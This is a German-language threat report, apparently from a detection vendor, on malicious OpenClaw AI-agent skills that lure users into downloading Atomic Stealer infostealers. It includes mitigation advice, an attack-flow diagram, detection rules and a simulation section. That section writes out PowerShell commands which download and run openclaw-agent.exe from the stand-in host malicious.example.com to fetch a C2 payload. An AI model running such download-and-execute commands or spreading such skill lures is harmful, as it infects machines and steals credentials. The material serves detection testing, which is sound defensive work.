Von Automatisierung zur Infektion: Wie OpenClaw AI-Agentenfähigkeiten bewaffnet werden
Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Artikel erklärt, wie bösartige OpenClaw-Skills als Malware-Übertragungsmechanismus für Nutzer der selbstgehosteten AI-Agent-Plattform genutzt werden. Bedrohungsakteure veröffentlichen Skills, die harmlos erscheinen, die Opfer jedoch letztendlich dazu verleiten, von Angreifern kontrollierte Binärdateien aus externen Quellen herunterzuladen und auszuführen. Beobachtete Nutzlasten umfassen Windows-Ausführbare Dateien und macOS Mach-O-Dateien, die als Varianten der Atomic Stealer Infostealer-Familie identifiziert wurden. Diese Aktivität stellt ein praktisches Versorgungskettenrisiko für persönliche und Entwickler-Arbeitsstationen dar, die auf von der Community bereitgestellte Skills angewiesen sind.
Untersuchung
VirusTotal Code Insight hat mehr als dreitausend OpenClaw-Skills überprüft und Hunderte entdeckt, die bösartiges oder risikobehaftetes Verhalten zeigten. In einem Beispiel bot ein von hightower6eu hochgeladener Skill eine Schritt-für-Schritt-Anleitung zum Herunterladen eines passwortgeschützten ZIP-Archivs von GitHub (Passwort: openclaw) und zur Ausführung von openclaw-agent.exe auf Windows. Auf macOS führte derselbe Skill Benutzer dazu, ein Base64-codiertes Skript von glot.io abzurufen, das dann eine Mach-O-Ausführbare Datei herunterlud und ausführte. Die resultierenden Binärdateien wurden von mehreren Sicherheitsengines als Trojanisierte Infostealer erkannt.
Minderung
Behandeln Sie Skill-Repositories als unzuverlässigen Code und führen Sie OpenClaw in einer sandboxed oder eng begrenzten Umgebung aus. Vermeiden Sie das Einfügen von Befehlen aus Skill-Beschreibungen und führen Sie keine Binärdateien aus, die aus nicht verifizierten externen Links abgerufen werden. Für Betreiber von Marktplätzen und Communities implementieren Sie eine Veröffentlichungsscan, der sich auf Remote-Download-Verhalten, obfuscierte Skriptlogik und Indikatoren für Anmeldeinformationsdiebstahl oder Datenexfiltration konzentriert. In Unternehmensumgebungen schulen Sie Benutzer über die Risiken der Installation von Community-erstellten Skills und fordern vor der Nutzung eine Überprüfung an.
Antwort
Suchen Sie nach OpenClaw-Skill-Paketen, die auf externe Download-URLs, passwortgeschützte Archive oder codierte Befehls-Stager verweisen. Alarmieren Sie bei der Ausführung unbekannter Binärdateien namens openclaw-agent.exe und bei verdächtigen Mach-O-Starts, die auf geskriptete Download-Aktivitäten folgen. Blockieren Sie die Konnektivität zu bekannten bösartigen Domänen und isolieren Sie betroffene Systeme für eine forensische Untersuchung, um zu bestätigen, ob eine Infostealer-Ausführung und eine Anmeldeinformations-Offenlegung stattgefunden hat.
„graph TB %% Klassendefinitionsabschnitt classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ffcc99 %% Techniknoten tech_software_extensions[„<b>Technik</b> – T1176 Software-Erweiterungen<br/><b>Beschreibung</b>: Gegner veröffentlicht bösartige Erweiterungen oder Pakete in einem Marktplatz, um Malware als legitime Funktionalität zu tarnen.“] class tech_software_extensions technique tech_user_execution[„<b>Technik</b> – T1204.002 Benutzerausführung: Bösartige Datei<br/><b>Beschreibung</b>: Opfer wird dazu verleitet, eine bösartige Datei auszuführen, die zusätzliche Nutzlasten herunterlädt und ausführt.“] class tech_user_execution technique tech_embedded_payloads[„<b>Technik</b> – T1027.009 Eingebettete Nutzlasten<br/><b>Beschreibung</b>: Bösartiger Code ist in anderen Dateien oder Skripten verborgen, um eine Erkennung zu vermeiden.“] class tech_embedded_payloads technique tech_polymorphic_code[„<b>Technik</b> – T1027.014 Polymorpher Code<br/><b>Beschreibung</b>: Code ändert sein Erscheinungsbild, behält jedoch die Funktionalität bei, um Verteidigungsmechanismen zu umgehen.“] class tech_polymorphic_code technique tech_decode[„<b>Technik</b> – T1140 Deobfuscation/Decode Dateien oder Informationen<br/><b>Beschreibung</b>: Opfer decodieren oder entschlüsseln obfuscierte Nutzlasten vor der Ausführung.“] class tech_decode technique tech_content_injection[„<b>Technik</b> – T1659 Inhaltseinspritzung<br/><b>Beschreibung</b>: Gegner injiziert bösartige Inhalte wie Download-Links oder Skripte in einen legitimen Workflow.“] class tech_content_injection technique %% Malware / Nutzlastknoten malware_infostealer[„<b>Malware</b> – Infostealer Trojaner<br/><b>Beschreibung</b>: Sammelt Anmeldedaten, Browserverlauf und andere sensible Daten vom Opfersystem.“] class malware_infostealer malware %% Prozessknoten proc_download_execute[„<b>Prozess</b> – Herunterladen und Ausführen externer Binärdatei<br/><b>Beschreibung</b>: Befehle, die aus dem Skill abgerufen wurden, laden zusätzliche Binärdateien herunter und führen sie aus.“] class proc_download_execute process proc_decode_execute[„<b>Prozess</b> – Dekodieren und Ausführen von Nutzlasten<br/><b>Beschreibung</b>: Base64u2011codiertes Skript wird dekodiert und die resultierende Trojaner wird ausgeführt.“] class proc_decode_execute process %% Verbindungen, die den Angriffsfluss zeigen tech_software_extensions u002du002d>|führt zu| tech_user_execution tech_user_execution u002du002d>|löst aus| proc_download_execute proc_download_execute u002du002d>|enthält| tech_embedded_payloads proc_download_execute u002du002d>|enthält| tech_polymorphic_code proc_download_execute u002du002d>|ermöglicht| tech_decode tech_decode u002du002d>|erleichtert| proc_decode_execute proc_decode_execute u002du002d>|führt aus| malware_infostealer malware_infostealer u002du002d>|ermöglicht| tech_content_injection „
Angriffsfluss
Erkennungen
Mögliche Base64-codierte Zeichenfolgenmanipulation [MacOS] (über cmdline)
Ansehen
Verdächtiger Curl-Ausführungsversuch [MacOS] (über cmdline)
Ansehen
MacOS Xattr Temp Ordnerattribute wurden gelöscht (über process_creation)
Ansehen
Mögliche Dateninfiltration/-exfiltration/C2 über Drittanbieterdienste/-tools (über proxy)
Ansehen
Mögliche Dateninfiltration/-exfiltration/C2 über Drittanbieterdienste/-tools (über dns)
Ansehen
IOCs (HashSha256) zur Erkennung: Von Automation zu Infektion: Wie OpenClaw AI Agent Skills bewaffnet werden
Ansehen
Ausführung bösartiger Nutzlasten über OpenClaw-Skills [Linux-Prozess Erstellung]
Ansehen
Erkennung von bösartiger OpenClaw Agent-Ausführung [Windows-Prozess Erstellung]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Basislinien-Vorflug-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu generieren, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer hat sich Zugang zu einem Opferarbeitsplatz verschafft und platziert die bösartige Binärdateiopenclaw-agent.exein das temporäre Verzeichnis des Benutzers. Die Binärdatei wird mit einer Befehlszeile ausgeführt, die ausdrücklich die Schlüsselwörter enthältherunterladenandausführen, um zusätzliche Nutzlasten von einem nicht vertrauenswürdigen C2-Server abzurufen und im Speicher auszuführen. Der Angreifer verwendet eine Standard-Windows-Eingabeaufforderung, um PowerShell-spezifischen Erkennungen zu vermeiden und so den Erwartungen der Sigma-Regel zu entsprechen.- Die Nutzlast ablegen:
$malPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath - Mit verdächtigen Argumenten ausführen:
"%TEMP%openclaw-agent.exe" download http://malicious.example.com/payload.bin execute - Der Agent kontaktiert den C2-Server, lädt
payload.binherunter, schreibt es auf die Festplatte und startet es, während die ursprüngliche Prozess-Befehlszeile weiterhin die Triggerwörter enthält.
- Die Nutzlast ablegen:
-
Regressionstest-Skript:
# ----------------------------------------------------------------------- # OpenClaw Agent Execution Simulation – löst Sigma-Erkennung aus # ----------------------------------------------------------------------- # 1. Laden Sie den bösartigen Agent herunter (simuliert mit einer harmlosen Datei) $agentUrl = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi" # Platzhalter harmlose Datei $agentPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath # 2. Führen Sie den Agent mit den erwarteten Befehlszeilen-Schlüsselwörtern aus $cmd = "`"$agentPath`" download http://malicious.example.com/payload.bin execute" Write-Host "Ausführen: $cmd" Start-Process -FilePath $agentPath -ArgumentList "download http://malicious.example.com/payload.bin execute" -NoNewWindow -Wait # 3. Optional: Simulieren Sie den Payload-Download (harmloser Stub) $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md" $payloadPath = "$env:TEMPpayload.bin" Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath Write-Host "Simulation abgeschlossen. Überprüfen Sie SIEM auf Erkennung." -
Bereinigungsbefehle:
# Entfernen Sie alle während der Simulation erstellten Artefakte $paths = @( "$env:TEMPopenclaw-agent.exe", "$env:TEMPpayload.bin" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force Write-Host "Gelöscht $p" } }